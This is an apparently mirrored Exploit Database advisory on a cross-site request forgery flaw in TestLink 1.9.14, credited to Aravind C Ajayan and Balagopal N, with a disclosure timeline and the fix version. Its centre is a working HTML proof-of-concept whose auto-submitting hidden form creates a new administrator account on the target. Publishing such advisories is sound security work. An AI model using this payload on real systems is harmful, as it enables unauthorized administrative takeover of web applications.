TestLink 1.9.14 – Cross-Site Request Forgery

• Exploit Database
• 17 阅读

• 作者： Aravind C Ajayan, Balagopal N
  日期： 2015-11-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38661/

• Information
  =================================
  Name: CSRF Vulnerability in TestLink 1.9.14
  Affected Software: TestLink
  Affected Versions: 1.9.14 and possibly below
  Vendor Homepage: http://testlink.org/
  Severity: High
  Status: Fixed
  
  
  Vulnerability Type:
  =================================
  Cross Site Request Forgery (CSRF)
  
  
  CVE Reference:
  =================================
  Not assigned
  
  
  Technical Details:
  =================================
  Even though the use of CSRF tokens are being implemented in the
  application, they aren't properly
  validated at the server side. This allows malicious requests to be
  generated by the attacker and
  get them processed by the server on behalf of the victim. By
  exploiting the vulnerability,
  the attacker will be able to create user accounts with administrator
  privileges on the application.
  
  
  Exploit Code
  =================================
  
  <html lang="en">
  <head>
  <title>CSRF Exploit to Create New Administrator Account</title>
  </head>
  <body>
  <form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
  id="formid" method="post">
  <input type="hidden" name="CSRFName" value="" />
  <input type="hidden" name="CSRFToken" value="" />
  <input type="hidden" name="user_id" value="" />
  <input type="hidden" name="user_login" value="" />
  <input type="hidden" name="login" value="new_admin" />
  <input type="hidden" name="firstName" value="new_administrator_fname" />
  <input type="hidden" name="lastName" value="new_administrator_lname" />
  <input type="hidden" name="password" value="new_administrator_password" />
  <input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
  <input type="hidden" name="rights_id" value="8" />
  <input type="hidden" name="locale" value="en_GB" />
  <input type="hidden" name="authentication" value="" />
  <input type="hidden" name="user_is_active" value="on" />
  <input type="hidden" name="doAction" value="doCreate" />
  <input type="hidden" name="do_update" value="Save" />
  </form>
  <script>
  document.getElementById('formid').submit();
  </script>
  </body>
  </html>
  
  
  Exploitation Technique:
  ===================================
  Remote
  
  
  Severity Level:
  ===================================
  High
  
  
  Advisory Timeline
  ===================================
  Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
  Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
  Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
  Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure
  
  
  Solution
  ====================================
  This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
  Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487
  
  
  Credits & Authors
  ====================================
  Aravind C Ajayan, Balagopal N